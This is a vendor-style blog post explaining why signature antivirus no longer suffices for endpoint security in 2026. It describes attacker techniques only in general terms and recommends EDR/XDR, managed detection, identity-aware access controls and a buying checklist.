Skip to content
Techerino
CybersecurityMay 11, 2026 · 9 min read

Endpoint Security in 2026 — Why Antivirus Alone Stopped Being Enough Years Ago

Signature-based AV catches yesterday's malware. The interesting attacks don't drop files anymore. A frank look at what actually protects a laptop in 2026 — and the shortlist of capabilities to demand.

The Techerino Team

Cybersecurity Practice

ENDPOINT TELEMETRY · LIVEAVSIG-BASEDEDRCOREHealthyLAPTOP-04IPHONE-12WIN-SRV-02MAC-09LINUX-11KIOSK-03IPAD-07LAPTOP-15BYOD-02ANOMALY · ISOLATEDBEHAVIOR > SIGNATURES

The most expensive incident we cleaned up in the last twelve months started on a fully patched laptop running a brand-name antivirus suite with a green checkmark in the dashboard. The endpoint did not detect anything because nothing “malicious” in the signature sense ever ran. The attacker logged in with stolen credentials, used the machine’s own tooling (PowerShell, scheduled tasks, the cloud sync agent) to move laterally, and exfiltrated data over the corporate VPN for nine days before anyone noticed.

This is not an unusual story. It is the median story. And it is the reason we now spend more time talking clients out of standalone AV renewals than we spend talking them into anything.

The shift attackers already made

Endpoint defense was originally a file problem. A bad executable landed on the disk, the AV engine matched it against a list of bad files, and the file was quarantined. That model worked beautifully from roughly 1995 to about 2015. It has been steadily losing for the decade since, and in 2026 it is operationally obsolete for one reason: attackers stopped dropping recognizable files.

The patterns we see across recent breaches:

  • Living off the land. The attacker uses built-in tools — PowerShell, certutil, rundll32, WMI, the M365 Graph API, the cloud agent that’s already trusted — to do everything from reconnaissance to staging to exfiltration. There is no “malware” to detect because no file is foreign.
  • Bring-your-own-vulnerable-driver (BYOVD). A signed driver from a legitimate but vulnerable vendor is loaded to disable security tooling at the kernel level. Your AV reports healthy right up until it doesn’t exist anymore.
  • Fileless and in-memory payloads. Code is reflected into the memory of a trusted process — your browser, your endpoint agent itself, your IDE — and never touches the disk. The signature engine has nothing to scan.
  • Credentials over code. Half of the “malware incidents” we’re asked to investigate turn out to be just-someone-logging-in with stolen credentials. There is no payload. There is a session token.

What signature antivirus misses

Signature AV is still worth running — it’s a low-cost, low-noise filter for the long tail of dumb commodity malware that somehow still circulates. The problem is that it has been quietly repositioned, by vendors and by the threat landscape, from “your defense” to “one cheap layer.” If your endpoint program is signature AV plus a Windows Defender checkbox, the parts of an attack you cannot see include:

  • Process lineage anomalies. Why is winword.exe spawning powershell.exe spawning certutil.exe at 3 AM? Your AV doesn’t know. Your EDR does.
  • Token theft and replay. A primary refresh token stolen from a laptop is reused from a residential IP in another country, an hour later, against the same M365 tenant. Pure identity story — no file involvement.
  • Suspicious script content via in-memory execution.AMSI-bypass techniques have been documented and packaged for years. AV engines that depend on AMSI for script visibility are blind to the techniques designed specifically to defeat AMSI.
  • Lateral movement signals. SMB enumeration, named-pipe abuse, WMI remote execution, and PsExec-style operations look like normal administration until you correlate timing, source, and downstream behavior across multiple endpoints.
The honest framing.Antivirus stops what a 2010-era attacker did. EDR/XDR is what you need to see what a 2026-era attacker does. They are complementary; one does not replace the other, but you can no longer have only one.

EDR, XDR, and what the acronyms actually buy you

The category names move around — EDR, EPP, XDR, MDR — and vendor marketing has done a thorough job of making them sound interchangeable. They are not. Stripped to function:

  • EPP (Endpoint Protection Platform). The modern antivirus tier. Signature + heuristic + lightweight behavior. Cheap, quiet, prevents commodity attacks. Run it.
  • EDR (Endpoint Detection & Response).Continuous behavioral telemetry — every process, every network connection, every script execution, every registry change — sent to a cloud analytics engine that flags anomalies in lineage, timing, and content. This is where you get the answer to “what happened on this machine yesterday at 2 AM?”
  • XDR (Extended Detection & Response). EDR data correlated with identity telemetry (M365, Okta, Google), email gateway events, network sensors, and cloud workload signals. The unit of investigation is no longer the endpoint — it’s the incident, regardless of where the breadcrumbs were dropped.
  • MDR (Managed Detection & Response). Twenty-four hour humans-on-the-other-end who watch the EDR/XDR consoles for you. Without an MDR (or an in-house SOC), EDR is just a tab in a browser nobody opens at 11 PM on a Friday.

Identity is half the endpoint story now

Almost every real-world endpoint compromise we’ve investigated in the last two years is, when you dig in, an identity compromise that happens to manifest on an endpoint. The boundary between the two has dissolved. Practically, that means a 2026 endpoint program also includes:

  • Conditional access tied to device posture — encryption on, EDR healthy, OS patched, no risky-IP geolocation mismatch — before any sign-in to M365, Google, or Okta succeeds.
  • Phish-resistant MFA (FIDO2 / Passkeys) for at minimum the executives, IT, finance, and anyone with administrative scope. Push-prompt authenticator codes are phishable and are routinely phished.
  • Just-in-time admin elevation. Laptops should not have standing local-admin or domain-admin sessions. PIM, PAM, or even a thin home-rolled elevation flow is fine — anything but always-on privilege.
  • Token-binding-aware session policies. Refresh tokens stolen from a corporate laptop should be unusable from a different device fingerprint. Most identity providers support this; most tenants haven’t enabled it.

A seven-line buying checklist

Whether you’re evaluating a renewal, an RFP, or a free trial, these seven questions filter out 90% of the inadequate tooling on the market. If the answer to any of them is hedged or unclear, keep looking.

  1. Does the agent capture and transmit full process lineage, not just blocked events? If you can’t investigate what the laptop did three days ago, you cannot do incident response.
  2. Is detection driven by behavior and ML in the cloud — not just signatures shipped to the agent? Local-only intelligence is yesterday’s intelligence.
  3. Does it isolate (network-quarantine) a host with one click? Containment time matters more than detection time. A 10-minute manual VLAN move during a live incident is unacceptable.
  4. Does it deliver telemetry to your SIEM/data lake in a format you can write queries against? Vendor lock-in on your own telemetry is a tax you pay forever.
  5. Are kernel-level protections in place against BYOVD and unsigned-driver loads? The Microsoft-recommended driver block list, enforced.
  6. Does it integrate with your identity provider for conditional access? Endpoint posture must be a signal your IdP can refuse to authenticate against.
  7. Is there a 24/7 human eyeballing the high-severity queue? Either inside your team or as part of an MDR contract. A console nobody watches is a license fee.

Three mistakes we still see in mid-market endpoint programs

  1. Buying the agent, skipping the operations. An EDR deployment without a documented response runbook, a named on-call, and quarterly drills is theater. The agent generates alerts; the alerts generate value only when something happens with them.
  2. Exclusions left in place from migration.“Temporary” performance-exclusion paths from the rollout three years ago are still in the policy. The most-targeted directories are usually the ones excluded for legacy app compatibility.
  3. Treating BYOD as an exception, not a class.Contractors, executives’ personal devices, the long tail of laptops that “don’t need” the corporate agent — this is where every recent compromise we’ve seen started. Either bring them under the program or block their access to tenant data with conditional access. There is no third option.

A modern endpoint program isn’t a single product. It’s the combination of a behavioral EDR/XDR, identity-aware conditional access, phish-resistant MFA, JIT privilege, and humans paying attention to the alerts. Most mid-market firms have three of those five. If you want a sober read on which ones you’re missing, we run a single-session endpoint assessment that produces a one-page gap list and a 90-day plan.

TaggedCybersecurityEndpointEDRIdentity

Keep reading

All articles